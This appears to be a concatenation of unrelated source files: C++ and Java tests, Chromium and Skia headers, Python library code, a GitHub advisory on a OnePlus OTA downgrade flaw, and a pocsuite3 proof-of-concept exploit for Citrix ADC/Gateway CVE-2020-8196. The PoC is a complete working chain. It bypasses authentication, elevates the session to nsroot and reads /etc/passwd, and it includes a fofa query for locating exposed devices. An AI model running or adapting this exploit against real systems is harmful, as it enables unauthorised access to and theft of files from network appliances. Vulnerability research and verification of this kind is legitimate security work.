void AssertNotShutdown();
// Called from libcef_dll.cc and libcef_dll_wrapper.cc.
void SetIsShutdown();
} // namespace shutdown_checker
#endif // CEF_LIBCEF_DLL_SHUTDOWN_CHECKER_H_
| 199
|
370
|
<reponame>luoyongheng/dtslam
#define ZLONG
#include <../Source/umfpack_report_triplet.c>
| 38
|
421
|
<filename>2020/CVE-2020-8196/poc/pocsuite3/CVE-2020-8196.py
import sys
import string
import json
from urllib.parse import quote
from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests, logger, VUL_TYPE
from pocsuite3.lib.utils import random_str
requests.packages.urllib3.disable_warnings()
class CitrixPOC(POCBase):
    """pocsuite3 PoC for CVE-2020-8196/8193-style Citrix ADC/Gateway LFI:
    abuses the unauthenticated /pcidss/report endpoint to obtain a session,
    upgrades it via /menu/ss and a rand key, then downloads an arbitrary
    file through /rapi/filedownload."""
    vulID = ''  # ssvid
    version = '1.0'
    author = ['z3r0yu']
    vulDate = '2020-07-11'
    createDate = '2020-07-11'
    updateDate = '2020-07-11'
    references = ['']
    name = 'Citrix LFI'
    appPowerLink = ''
    appName = 'Citrix'
    appVersion = '''
Citrix ADC、Citrix Gateway < 13.0、58.30
Citrix ADC、NetScaler Gateway < 12.1、57.18
Citrix ADC、NetScaler Gateway < 12.0、63.21
Citrix ADC、NetScaler Gateway < 11.1、64.14
NetScaler ADC、NetScaler Gateway < 10.5、70.18
Citrix SD-WAN WANOP < 11.1.1a
Citrix SD-WAN WANOP < 11.0.3d
Citrix SD-WAN WANOP < 10.2.7
'''
    vulType = VUL_TYPE.COMMAND_EXECUTION
    desc = '''
https://github.com/dmaasland/dmaasland.github.io/blob/10c33bbdab/posts/citrix.md
https://nosec.org/home/detail/4506.html
fofa.so
app="Citrix-Netscaler" || app="Citrix-ADC" || app="Citrix-NetScaler-Gateway" || app="Citrix-Gateway"
'''
    samples = []
    install_requires = ['']
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    def create_session(self, base_url, session):
        # Unauthenticated POST to /pcidss/report makes the appliance hand
        # out a SESSID cookie (the auth-bypass primitive).
        url = '{0}/pcidss/report'.format(base_url)
        params = {
            'type': 'allprofiles',
            'sid': 'loginchallengeresponse1requestbody',
            'username': 'nsroot',
            'set': '1'
        }
        headers = {
            'Content-Type': 'application/xml',
            'X-NITRO-USER': random_str(length=8),
            'X-NITRO-PASS': random_str(length=8),
        }
        data = '<appfwprofile><login></login></appfwprofile>'
        session.post(url=url, params=params, headers=headers,
                     data=data, verify=False)
        return session
    def fix_session(self, base_url, session):
        # Marks the bypassed session as belonging to 'nsroot' so later
        # admin endpoints accept it.
        url = '{0}/menu/ss'.format(base_url)
        params = {
            'sid': 'nsroot',
            'username': 'nsroot',
            'force_setup': '1'
        }
        session.get(url=url, params=params, verify=False)
    def get_rand(self, base_url, session):
        # Scrapes the per-session CSRF-like 'rand' token out of /menu/stc.
        url = '{0}/menu/stc'.format(base_url)
        r = session.get(url=url, verify=False)
        for line in r.text.split('\n'):
            if 'var rand =' in line:
                rand = line.split('"')[1]
                return rand
    def do_lfi(self, base_url, session, rand):
        # Requests /etc/passwd (URL-encoded) through the file-download API.
        PAYLOAD = '%2fetc%2fpasswd'
        url = '{0}/rapi/filedownload?filter=path:{1}'.format(base_url, PAYLOAD)
        headers = {
            'Content-Type': 'application/xml',
            'X-NITRO-USER': random_str(length=8),
            'X-NITRO-PASS': random_str(length=8),
            'rand_key': rand
        }
        data = '<clipermission></clipermission>'
        r = session.post(url=url, headers=headers, data=data, verify=False)
        # print(r.text)
        return r.text
    def _verify(self):
        # Full exploit chain; the target is vulnerable when the fetched
        # file contains the string 'root'.
        result = {}
        # print(self.url)
        base_url = self.url
        # print(url)
        try:
            logger.info('[-] Creating session..')
            session = requests.Session()
            self.create_session(base_url, session)
            logger.info(session.cookies.get_dict())
            logger.info(
                '[+] Got session: {0}'.format(session.cookies.get_dict()['SESSID']))
            logger.info('[-] Fixing session..')
            self.fix_session(base_url, session)
            logger.info('[-] Getting rand..')
            rand = self.get_rand(base_url, session)
            logger.info('[+] Got rand: {0}'.format(rand))
            logger.info('[-] Re-breaking session..')
            self.create_session(base_url, session)
            logger.info('[-] Getting file..')
            file_text = self.do_lfi(base_url, session, rand)
            if 'root' in file_text:
                result['VerifyInfo'] = {}
                result['VerifyInfo']['URL'] = base_url
        except Exception as ex:
            logger.error(str(ex))
        return self.parse_output(result)
    def _attack(self):
        # Attack mode has no extra payload; reuse verification.
        return self._verify()
    def parse_output(self, result):
        # Standard pocsuite3 result wrapping.
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output
register_poc(CitrixPOC)
| 2,235
|
496
|
package com.tns.system.classes.loading.impl;
import com.tns.system.classes.caching.ClassCache;
import com.tns.system.classes.loading.ClassStorageService;
import com.tns.system.classes.loading.LookedUpClassNotFound;
import com.tns.system.classloaders.ClassLoadersCollection;
import org.junit.Before;
import org.junit.Test;
import org.mockito.Mock;
import org.mockito.Mockito;
import org.mockito.MockitoAnnotations;
import java.util.Arrays;
import java.util.Collections;
import static org.junit.Assert.assertEquals;
import static org.junit.Assert.assertSame;
import static org.junit.Assert.fail;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.verify;
import static org.mockito.Mockito.verifyZeroInteractions;
import static org.mockito.Mockito.when;
/**
 * Unit tests for {@code ClassStorageServiceImpl}, verifying its lookup
 * order: class cache first, then {@code Class.forName}, then the
 * registered class loaders collection.
 */
public class ClassStorageServiceImplTest {
    /** A class name that is NOT resolvable via Class.forName. */
    private static final String TEST_CLASS_LOOKUP_NAME = "com.test.Test";
    @Mock
    private ClassCache classCache;
    @Mock
    private ClassLoadersCollection classLoadersCollection;
    private ClassStorageService classStorageService;
    @Before
    public void setUp() {
        MockitoAnnotations.initMocks(this);
        classStorageService = new ClassStorageServiceImpl(classCache, classLoadersCollection);
    }
    @Test
    public void testRetrieveClassShouldCheckClassCacheFirst() {
        // A cache hit must short-circuit: the loaders collection is untouched.
        Class<?> testResult = Object.class;
        Mockito.<Class<?>>when(classCache.getCachedClass(TEST_CLASS_LOOKUP_NAME)).thenReturn(testResult);
        Class<?> clazz = classStorageService.retrieveClass(TEST_CLASS_LOOKUP_NAME);
        assertSame("Unexpected class returned", testResult, clazz);
        verify(classCache).getCachedClass(TEST_CLASS_LOOKUP_NAME);
        verifyZeroInteractions(classLoadersCollection);
    }
    @Test
    public void testRetrieveClassShouldCheckClassForNameSecond() {
        // java.lang.Object resolves via Class.forName; loaders stay untouched.
        Class<?> clazz = classStorageService.retrieveClass(Object.class.getName());
        assertSame("Unexpected class returned", Object.class, clazz);
        verify(classCache).getCachedClass(Object.class.getName());
        verifyZeroInteractions(classLoadersCollection);
    }
    @Test
    public void testRetrieveClassShouldCheckClassLoadersCollectionThird() throws ClassNotFoundException {
        // Cache miss + forName miss falls through to the registered loaders.
        Class<?> testResult = Object.class;
        ClassLoader mockedClassLoader = mock(ClassLoader.class);
        Mockito.<Class<?>>when(mockedClassLoader.loadClass(TEST_CLASS_LOOKUP_NAME)).thenReturn(testResult);
        when(classLoadersCollection.getClassLoadersCollection()).thenReturn(Collections.singleton(mockedClassLoader));
        Class<?> clazz = classStorageService.retrieveClass(TEST_CLASS_LOOKUP_NAME);
        assertSame("Unexpected class returned", testResult, clazz);
        verify(mockedClassLoader).loadClass(TEST_CLASS_LOOKUP_NAME);
    }
    @Test
    public void testRetrieveClassShouldCheckClassLoadersCollectionAndContinueToNextClassLoaderWithoutCrash() throws ClassNotFoundException {
        // The first loader (no stub -> returns null/throws) must not abort
        // the search; the second loader supplies the class.
        Class<?> testResult = Object.class;
        ClassLoader mockedClassLoaderWithoutClass = mock(ClassLoader.class);
        ClassLoader mockedClassLoaderWithClass = mock(ClassLoader.class);
        Mockito.<Class<?>>when(mockedClassLoaderWithClass.loadClass(TEST_CLASS_LOOKUP_NAME)).thenReturn(testResult);
        when(classLoadersCollection.getClassLoadersCollection()).thenReturn(Arrays.asList(mockedClassLoaderWithoutClass, mockedClassLoaderWithClass));
        Class<?> clazz = classStorageService.retrieveClass(TEST_CLASS_LOOKUP_NAME);
        assertSame("Unexpected class returned", testResult, clazz);
        verify(mockedClassLoaderWithoutClass).loadClass(TEST_CLASS_LOOKUP_NAME);
        verify(mockedClassLoaderWithClass).loadClass(TEST_CLASS_LOOKUP_NAME);
    }
    @Test
    public void testRetrieveClassShouldThrowExceptionIfClassIsNotFound() {
        // Exhausting every source must raise LookedUpClassNotFound with the
        // looked-up name in the message.
        try {
            classStorageService.retrieveClass(TEST_CLASS_LOOKUP_NAME);
            fail();
        } catch (LookedUpClassNotFound e) {
            assertEquals("Unexpected exception message", "Class \"" + TEST_CLASS_LOOKUP_NAME + "\" not found.", e.getMessage());
        }
    }
    @Test
    public void storeClass() {
        // Storing a class updates both the cache and the loaders collection.
        Class<?> storedClass = Object.class;
        classStorageService.storeClass(TEST_CLASS_LOOKUP_NAME, storedClass);
        verify(classCache).addClass(TEST_CLASS_LOOKUP_NAME, storedClass);
        verify(classLoadersCollection).addClassLoader(storedClass.getClassLoader());
    }
}
| 1,569
|
2,151
|
/*
* Copyright 2016 Google Inc.
*
* Use of this source code is governed by a BSD-style license that can be
* found in the LICENSE file.
*/
#ifndef SKSL_FLOATLITERAL
#define SKSL_FLOATLITERAL
#include "SkSLContext.h"
#include "SkSLExpression.h"
namespace SkSL {
/**
* A literal floating point number.
*/
/**
 * A literal floating point number.
 */
struct FloatLiteral : public Expression {
    // If no explicit type is supplied, the literal defaults to the context's
    // built-in float type.
    FloatLiteral(const Context& context, int offset, double value,
                 const Type* type = nullptr)
    : INHERITED(offset, kFloatLiteral_Kind, type ? *type : *context.fFloat_Type)
    , fValue(value) {}

    String description() const override {
        return to_string(fValue);
    }

    // Evaluating a literal never has side effects.
    bool hasSideEffects() const override {
        return false;
    }

    bool isConstant() const override {
        return true;
    }

    // NOTE(review): blindly casts 'other' to FloatLiteral — presumably callers
    // only invoke this on expressions of matching kind; confirm that invariant
    // before relying on it elsewhere.
    bool compareConstant(const Context& context, const Expression& other) const override {
        FloatLiteral& f = (FloatLiteral&) other;
        return fValue == f.fValue;
    }

    double getConstantFloat() const override {
        return fValue;
    }

    // The literal's value; immutable after construction.
    const double fValue;

    typedef Expression INHERITED;
};
} // namespace
#endif
| 425
|
892
|
<filename>advisories/unreviewed/2022/05/GHSA-54jw-4xpp-q62p/GHSA-54jw-4xpp-q62p.json
{
"schema_version": "1.2.0",
"id": "GHSA-54jw-4xpp-q62p",
"modified": "2022-05-13T01:46:21Z",
"published": "2022-05-13T01:46:21Z",
"aliases": [
"CVE-2017-5948"
],
"details": "An issue was discovered on OnePlus One, X, 2, 3, and 3T devices. OxygenOS and HydrogenOS are vulnerable to downgrade attacks. This is due to a lenient 'updater-script' in OTAs that does not check that the current version is lower than or equal to the given image's. Downgrades can occur even on locked bootloaders and without triggering a factory reset, allowing for exploitation of now-patched vulnerabilities with access to user data. This vulnerability can be exploited by a Man-in-the-Middle (MiTM) attacker targeting the update process. This is possible because the update transaction does not occur over TLS (CVE-2016-10370). In addition, a physical attacker can reboot the phone into recovery, and then use 'adb sideload' to push the OTA (on OnePlus 3/3T 'Secure Start-up' must be off).",
"severity": [
{
"type": "CVSS_V3",
"score": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N"
}
],
"affected": [
],
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2017-5948"
},
{
"type": "WEB",
"url": "https://alephsecurity.com/vulns/aleph-2017008"
}
],
"database_specific": {
"cwe_ids": [
"CWE-20"
],
"severity": "MODERATE",
"github_reviewed": false
}
}
| 617
|
1,630
|
#!/usr/bin/env python
# -*- encoding: utf-8 -*-
import torch.distributed as dist
from colossalai.global_variables import tensor_parallel_env as env
from colossalai.registry import DIST_GROUP_INITIALIZER
from ..parallel_mode import ParallelMode
from .process_group_initializer import ProcessGroupInitializer
@DIST_GROUP_INITIALIZER.register_module
class Initializer_1D(ProcessGroupInitializer):
    """A ProcessGroupInitializer for 1d tensor parallelism.

    Args:
        rank (int): The rank of current process.
        world_size (int): Size of whole communication world.
        config (Config): Running configuration.
        data_parallel_size (int): Size of data parallel.
        pipeline_parallel_size (int): Size of pipeline parallel.
        tensor_parallel_size (int): Size of tensor parallel.
    """

    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        # Number of disjoint 1D tensor-parallel groups the world is split into.
        self.num_group = self.world_size // self.tensor_parallel_size

    def init_dist_group(self):
        """Initialize 1D tensor parallel groups, and assign local_ranks and groups to each gpu.

        Returns:
            Tuple (local_rank, group_world_size, process_group, cpu_group, ranks_in_group, mode):
                1D tensor parallelism's information in a tuple.
        """
        local_rank = None
        ranks_in_group = None
        process_group = None
        cpu_group = None
        group_world_size = None
        mode = ParallelMode.PARALLEL_1D
        env.parallel_input_1d = False
        # Every rank iterates over *all* groups: torch.distributed.new_group is
        # a collective that must be called by every process in the same order,
        # even for groups the current rank does not belong to.
        for i in range(self.num_group):
            # Ranks of group i are consecutive: [i * tp_size, (i + 1) * tp_size).
            ranks = [i * self.tensor_parallel_size + j for j in range(self.tensor_parallel_size)]
            group = dist.new_group(ranks)
            # Keep a companion gloo group for CPU communication when the default
            # backend is not already gloo.
            group_cpu = dist.new_group(ranks, backend='gloo') if dist.get_backend() != 'gloo' else group
            if self.rank in ranks:
                local_rank = ranks.index(self.rank)
                group_world_size = len(ranks)
                process_group = group
                cpu_group = group_cpu
                ranks_in_group = ranks
        return local_rank, group_world_size, process_group, cpu_group, ranks_in_group, mode
| 883
|
376
|
<filename>lecture02/src/test/java/ru/atom/geometry/BarPointCollisionTest.java<gh_stars>100-1000
package ru.atom.geometry;
import org.junit.Ignore;
import org.junit.Test;
import static junit.framework.TestCase.assertTrue;
import static org.junit.Assert.assertFalse;
// NOTE(review): the entire suite is disabled via @Ignore — confirm whether
// this is intentional (e.g. exercises not yet implemented) before enabling.
@Ignore
public class BarPointCollisionTest {

    // All tests use the same axis-aligned bar spanning (0,0) to (100,100).
    // Points on the border or corners are expected to count as colliding.

    @Test
    public void pointInsideBar() {
        Collider bar = Geometry.createBar(0, 0, 100, 100);
        Collider point = Geometry.createPoint(50, 50);
        assertTrue(bar.isColliding(point));
    }

    @Test
    public void pointOnCornerOfBar() {
        Collider bar = Geometry.createBar(0, 0, 100, 100);
        Collider point = Geometry.createPoint(0, 0);
        assertTrue(bar.isColliding(point));
    }

    @Test
    public void pointOnBorderOfBar() {
        Collider bar = Geometry.createBar(0, 0, 100, 100);
        Collider point = Geometry.createPoint(0, 50);
        assertTrue(bar.isColliding(point));
    }

    // Point beyond the top edge only.
    @Test
    public void pointOutsideOfBar1() {
        Collider bar = Geometry.createBar(0, 0, 100, 100);
        Collider point = Geometry.createPoint(0, 150);
        assertFalse(bar.isColliding(point));
    }

    // Point beyond the right edge only.
    @Test
    public void pointOutsideOfBar2() {
        Collider bar = Geometry.createBar(0, 0, 100, 100);
        Collider point = Geometry.createPoint(150, 0);
        assertFalse(bar.isColliding(point));
    }

    // Point beyond both edges.
    @Test
    public void pointOutsideOfBar3() {
        Collider bar = Geometry.createBar(0, 0, 100, 100);
        Collider point = Geometry.createPoint(150, 150);
        assertFalse(bar.isColliding(point));
    }
}
| 643
|
777
|
// Copyright 2015 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef COMPONENTS_OMNIBOX_BROWSER_CLIPBOARD_URL_PROVIDER_H_
#define COMPONENTS_OMNIBOX_BROWSER_CLIPBOARD_URL_PROVIDER_H_
#include "base/macros.h"
#include "components/omnibox/browser/autocomplete_provider.h"
#include "components/omnibox/browser/history_url_provider.h"
class AutocompleteProviderClient;
class ClipboardRecentContent;
class HistoryURLProvider;
// Autocomplete provider offering content based on the clipboard's content.
class ClipboardURLProvider : public AutocompleteProvider {
public:
ClipboardURLProvider(AutocompleteProviderClient* client,
HistoryURLProvider* history_url_provider,
ClipboardRecentContent* clipboard_content);
// AutocompleteProvider implementation.
void Start(const AutocompleteInput& input, bool minimal_changes) override;
private:
~ClipboardURLProvider() override;
AutocompleteProviderClient* client_;
ClipboardRecentContent* clipboard_content_;
// Used for efficiency when creating the verbatim match. Can be NULL.
HistoryURLProvider* history_url_provider_;
DISALLOW_COPY_AND_ASSIGN(ClipboardURLProvider);
};
#endif // COMPONENTS_OMNIBOX_BROWSER_CLIPBOARD_URL_PROVIDER_H_
| 443
|
14,668
|
<gh_stars>1000+
// Copyright 2021 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#ifndef CHROMECAST_METRICS_METRICS_UTIL_H_
#define CHROMECAST_METRICS_METRICS_UTIL_H_
#include "net/base/ip_address.h"
namespace chromecast {
// Pack last two bytes of IPv4 or IPv6 address into value used for logging
// partial sender IP fragments (e.g. discovery code and virtual connection
// details). If the address is empty or not valid IPv4/IPv6 then zeros will
// be filled into the packed fragment.
uint32_t GetIPAddressFragmentForLogging(const net::IPAddressBytes& sender_ip);
} // namespace chromecast
#endif // CHROMECAST_METRICS_METRICS_UTIL_H_
| 239
|
799
|
<filename>pyowm/airpollutionapi30/coindex.py
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pyowm.commons import exceptions
from pyowm.utils import formatting, timestamps
from pyowm.weatherapi25 import location
class COIndex:
    """
    A class representing the Carbon monOxide Index observed in a certain location
    in the world. The index is made up of several measurements, each one at a
    different atmospheric pressure. The location is represented by the
    encapsulated *Location* object.

    :param reference_time: GMT UNIXtime telling when the CO data has been measured
    :type reference_time: int
    :param location: the *Location* relative to this CO observation
    :type location: *Location*
    :param interval: the time granularity of the CO observation
    :type interval: str
    :param co_samples: the CO samples
    :type co_samples: list of dicts
    :param reception_time: GMT UNIXtime telling when the CO observation has
        been received from the OWM Weather API
    :type reception_time: int
    :returns: an *COIndex* instance
    :raises: *ValueError* when negative values are provided as reception time,
        CO samples are not provided in a list
    """

    def __init__(self, reference_time, location, interval, co_samples,
                 reception_time):
        if reference_time < 0:
            raise ValueError("'reference_time' must be greater than 0")
        self.ref_time = reference_time
        self.location = location
        self.interval = interval
        if not isinstance(co_samples, list):
            raise ValueError("'co_samples' must be a list")
        # Samples are kept sorted by descending Volume Mixing Ratio value.
        self.co_samples = sorted(co_samples, key=lambda k: k['value'], reverse=True)
        if reception_time < 0:
            raise ValueError("'reception_time' must be greater than 0")
        self.rec_time = reception_time

    def reference_time(self, timeformat='unix'):
        """
        Returns the GMT time telling when the CO samples have been measured

        :param timeformat: the format for the time value. May be:
            '*unix*' (default) for UNIX time
            '*iso*' for ISO8601-formatted string in the format ``YYYY-MM-DD HH:MM:SS+00:00``
            '*date* for ``datetime.datetime`` object instance
        :type timeformat: str
        :returns: an int or a str
        :raises: ValueError when an unknown time format is provided
        """
        return formatting.timeformat(self.ref_time, timeformat)

    def reception_time(self, timeformat='unix'):
        """
        Returns the GMT time telling when the CO observation has been received
        from the OWM Weather API

        :param timeformat: the format for the time value. May be:
            '*unix*' (default) for UNIX time
            '*iso*' for ISO8601-formatted string in the format ``YYYY-MM-DD HH:MM:SS+00:00``
            '*date* for ``datetime.datetime`` object instance
        :type timeformat: str
        :returns: an int or a str
        :raises: ValueError when an unknown time format is provided
        """
        return formatting.timeformat(self.rec_time, timeformat)

    def sample_with_highest_vmr(self):
        """
        Returns the CO sample with the highest Volume Mixing Ratio value

        :return: dict
        :raises: ValueError when no samples are available
        """
        return max(self.co_samples, key=lambda x: x['value'])

    def sample_with_lowest_vmr(self):
        """
        Returns the CO sample with the lowest Volume Mixing Ratio value

        :return: dict
        :raises: ValueError when no samples are available
        """
        return min(self.co_samples, key=lambda x: x['value'])

    def is_forecast(self):
        """
        Tells if the current CO observation refers to the future with respect
        to the current date

        :return: bool
        """
        return timestamps.now(timeformat='unix') < \
            self.reference_time(timeformat='unix')

    @classmethod
    def from_dict(cls, the_dict):
        """
        Parses a *COIndex* instance out of a data dictionary. Only certain properties of the data dictionary
        are used: if these properties are not found or cannot be parsed, an exception is issued.

        :param the_dict: the input dictionary
        :type the_dict: `dict`
        :returns: a *COIndex* instance or ``None`` if no data is available
        :raises: *ParseAPIResponseError* if it is impossible to find or parse the data needed to build the result
        """
        if the_dict is None:
            raise exceptions.ParseAPIResponseError('Data is None')
        try:
            # -- reference time (strip away Z and T on ISO8601 format)
            t = the_dict['time'].replace('Z', '+00:00').replace('T', ' ')
            reference_time = formatting.ISO8601_to_UNIXtime(t)
            # -- reception time (now)
            reception_time = timestamps.now('unix')
            # -- location
            lon = float(the_dict['location']['longitude'])
            lat = float(the_dict['location']['latitude'])
            place = location.Location(None, lon, lat, None)
            # -- CO samples
            co_samples = the_dict['data']
        except (KeyError, ValueError, TypeError, AttributeError):
            # Previously only KeyError was caught, so malformed values (e.g.
            # non-numeric coordinates or a non-string/invalid ISO timestamp)
            # leaked out as raw ValueError/TypeError/AttributeError, breaking
            # the documented ParseAPIResponseError contract.
            raise exceptions.ParseAPIResponseError(
                ''.join([__name__, ': impossible to parse COIndex']))
        return COIndex(reference_time, place, None, co_samples, reception_time)

    def to_dict(self):
        """Dumps object to a dictionary

        :returns: a `dict`
        """
        return {"reference_time": self.ref_time,
                "location": self.location.to_dict(),
                "interval": self.interval,
                "co_samples": self.co_samples,
                "reception_time": self.rec_time}

    def __repr__(self):
        return "<%s.%s - reference time=%s, reception time=%s, location=%s, " \
               "interval=%s>" % (
                   __name__,
                   self.__class__.__name__,
                   self.reference_time('iso'),
                   self.reception_time('iso'),
                   str(self.location),
                   self.interval)
| 2,505
|
3,913
|
package cn.iocoder.yudao.framework;
| 15
|
326
|
package com.nilhcem.hostseditor.task;
import android.content.Context;
import android.os.AsyncTask;
import com.nilhcem.hostseditor.HostsEditorApplication;
import com.nilhcem.hostseditor.R;
import com.nilhcem.hostseditor.core.Host;
import com.nilhcem.hostseditor.core.HostsManager;
import com.nilhcem.hostseditor.event.LoadingEvent;
import com.nilhcem.hostseditor.event.RefreshHostsEvent;
import com.squareup.otto.Bus;
import java.util.ArrayList;
import java.util.List;
import javax.inject.Inject;
/**
* AsyncTask that gets all valid hosts and triggers a {@code RefreshHostEvent} event.
*/
/**
 * AsyncTask that loads all valid host entries and publishes a
 * {@code RefreshHostsEvent} carrying the result.
 */
public class ListHostsAsync extends AsyncTask<Boolean, Void, List<Host>> {

    @Inject Bus mBus;
    @Inject HostsManager mHostsManager;

    public ListHostsAsync(Context context) {
        HostsEditorApplication.get(context).component().inject(this);
    }

    @Override
    protected void onPreExecute() {
        super.onPreExecute();
        // Tell listeners a (potentially slow) hosts load is starting.
        mBus.post(new LoadingEvent(true, R.string.loading_hosts));
    }

    @Override
    protected List<Host> doInBackground(Boolean... params) {
        // A null first argument means "no forced refresh".
        boolean forceRefresh = Boolean.TRUE.equals(params[0]);

        // Keep only entries that parse as valid host definitions.
        List<Host> validHosts = new ArrayList<>();
        for (Host candidate : mHostsManager.getHosts(forceRefresh)) {
            if (candidate.isValid()) {
                validHosts.add(candidate);
            }
        }
        return validHosts;
    }

    @Override
    protected void onPostExecute(List<Host> result) {
        super.onPostExecute(result);
        mBus.post(new RefreshHostsEvent(result));
    }
}
| 691
|
575
|
// Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.
#include "third_party/blink/renderer/core/page/focus_controller.h"
#include <memory>
#include "testing/gtest/include/gtest/gtest.h"
#include "third_party/blink/public/mojom/input/focus_type.mojom-blink.h"
#include "third_party/blink/renderer/bindings/core/v8/v8_binding_for_core.h"
#include "third_party/blink/renderer/core/dom/shadow_root.h"
#include "third_party/blink/renderer/core/html/html_element.h"
#include "third_party/blink/renderer/core/testing/page_test_base.h"
namespace blink {

// Fixture that sets up an empty test page; individual tests populate the
// document body as needed.
class FocusControllerTest : public PageTestBase {
 private:
  void SetUp() override { PageTestBase::SetUp(IntSize()); }
};

// Initial focus must land on the first focusable element even when a
// sequential focus navigation starting point was set beforehand.
TEST_F(FocusControllerTest, SetInitialFocus) {
  GetDocument().body()->setInnerHTML("<input><textarea>");
  auto* input = To<Element>(GetDocument().body()->firstChild());
  // Set sequential focus navigation point before the initial focus.
  input->focus();
  input->blur();
  GetFocusController().SetInitialFocus(mojom::blink::FocusType::kForward);
  EXPECT_EQ(input, GetDocument().FocusedElement())
      << "We should ignore sequential focus navigation starting point in "
         "setInitialFocus().";
}

// Forward focus advance starting from a text node that follows a shadow host
// must not hit assertions (regression test for crbug.com/609012).
TEST_F(FocusControllerTest, DoNotCrash1) {
  GetDocument().body()->setInnerHTML(
      "<div id='host'></div>This test is for crbug.com/609012<p id='target' "
      "tabindex='0'></p>");
  // <div> with shadow root
  auto* host = To<Element>(GetDocument().body()->firstChild());
  host->AttachShadowRootInternal(ShadowRootType::kOpen);
  // "This test is for crbug.com/609012"
  Node* text = host->nextSibling();
  // <p>
  auto* target = To<Element>(text->nextSibling());
  // Set sequential focus navigation point at text node.
  GetDocument().SetSequentialFocusNavigationStartingPoint(text);
  GetFocusController().AdvanceFocus(mojom::blink::FocusType::kForward);
  EXPECT_EQ(target, GetDocument().FocusedElement())
      << "This should not hit assertion and finish properly.";
}

// Backward-direction variant of DoNotCrash1 (crbug.com/609012).
TEST_F(FocusControllerTest, DoNotCrash2) {
  GetDocument().body()->setInnerHTML(
      "<p id='target' tabindex='0'></p>This test is for crbug.com/609012<div "
      "id='host'></div>");
  // <p>
  auto* target = To<Element>(GetDocument().body()->firstChild());
  // "This test is for crbug.com/609012"
  Node* text = target->nextSibling();
  // <div> with shadow root
  auto* host = To<Element>(text->nextSibling());
  host->AttachShadowRootInternal(ShadowRootType::kOpen);
  // Set sequential focus navigation point at text node.
  GetDocument().SetSequentialFocusNavigationStartingPoint(text);
  GetFocusController().AdvanceFocus(mojom::blink::FocusType::kBackward);
  EXPECT_EQ(target, GetDocument().FocusedElement())
      << "This should not hit assertion and finish properly.";
}

// Activating the focus controller of a shut-down document must not crash.
TEST_F(FocusControllerTest, SetActiveOnInactiveDocument) {
  // Test for crbug.com/700334
  GetDocument().Shutdown();
  // Document::shutdown() detaches document from its frame, and thus
  // document().page() becomes nullptr.
  // Use DummyPageHolder's page to retrieve FocusController.
  GetPage().GetFocusController().SetActive(true);
}

// This test is for crbug.com/733218
TEST_F(FocusControllerTest, SVGFocusableElementInForm) {
  GetDocument().body()->setInnerHTML(
      "<form>"
      "<input id='first'>"
      "<svg width='100px' height='100px' tabindex='0'>"
      "<circle cx='50' cy='50' r='30' />"
      "</svg>"
      "<input id='last'>"
      "</form>");
  auto* form = To<Element>(GetDocument().body()->firstChild());
  auto* first = To<Element>(form->firstChild());
  auto* last = To<Element>(form->lastChild());
  Element* next = GetFocusController().NextFocusableElementInForm(
      first, mojom::blink::FocusType::kForward);
  EXPECT_EQ(next, last)
      << "SVG Element should be skipped even when focusable in form.";
  Element* prev = GetFocusController().NextFocusableElementInForm(
      next, mojom::blink::FocusType::kBackward);
  EXPECT_EQ(prev, first)
      << "SVG Element should be skipped even when focusable in form.";
}

// Exercises FindFocusableElementAfter in forward, backward and "none"
// traversal directions over a mix of focusable and non-focusable elements.
TEST_F(FocusControllerTest, FindFocusableAfterElement) {
  GetDocument().body()->setInnerHTML(
      "<input id='first'><div id='second'></div><input id='third'><div "
      "id='fourth' tabindex='0'></div>");
  Element* first = GetElementById("first");
  Element* second = GetElementById("second");
  Element* third = GetElementById("third");
  Element* fourth = GetElementById("fourth");
  EXPECT_EQ(third, GetFocusController().FindFocusableElementAfter(
                       *first, mojom::blink::FocusType::kForward));
  EXPECT_EQ(third, GetFocusController().FindFocusableElementAfter(
                       *second, mojom::blink::FocusType::kForward));
  EXPECT_EQ(fourth, GetFocusController().FindFocusableElementAfter(
                        *third, mojom::blink::FocusType::kForward));
  EXPECT_EQ(nullptr, GetFocusController().FindFocusableElementAfter(
                         *fourth, mojom::blink::FocusType::kForward));
  EXPECT_EQ(nullptr, GetFocusController().FindFocusableElementAfter(
                         *first, mojom::blink::FocusType::kBackward));
  EXPECT_EQ(first, GetFocusController().FindFocusableElementAfter(
                       *second, mojom::blink::FocusType::kBackward));
  EXPECT_EQ(first, GetFocusController().FindFocusableElementAfter(
                       *third, mojom::blink::FocusType::kBackward));
  EXPECT_EQ(third, GetFocusController().FindFocusableElementAfter(
                       *fourth, mojom::blink::FocusType::kBackward));
  EXPECT_EQ(nullptr, GetFocusController().FindFocusableElementAfter(
                         *first, mojom::blink::FocusType::kNone));
}

}  // namespace blink
| 2,080
|
336
|
<reponame>idrnyu/LA104
/*
* Terminal-BASIC is a lightweight BASIC-like language interpreter
*
* Copyright (C) 2016-2018 <NAME> <<EMAIL>>
* Copyright (C) 2019,2020 Terminal-BASIC team
* <https://bitbucket.org/%7Bf50d6fee-8627-4ce4-848d-829168eedae5%7D/>
*
* This program is free software: you can redistribute it and/or modify
* it under the terms of the GNU General Public License as published by
* the Free Software Foundation, either version 3 of the License, or
* (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#ifndef HAL_H
#define HAL_H
#include <assert.h>
#include <inttypes.h>
#include <stdint.h>
#include "sys/cdefs.h"
#include "tools.h"
#include "HAL_config.h"
__BEGIN_DECLS
/**
* @brief Initialize hardware interface
*/
void HAL_initialize();
/**
* @brief finalize hardware interface
*/
void HAL_finalize();
/**
* @brief Regular update platform state
*/
void HAL_update();
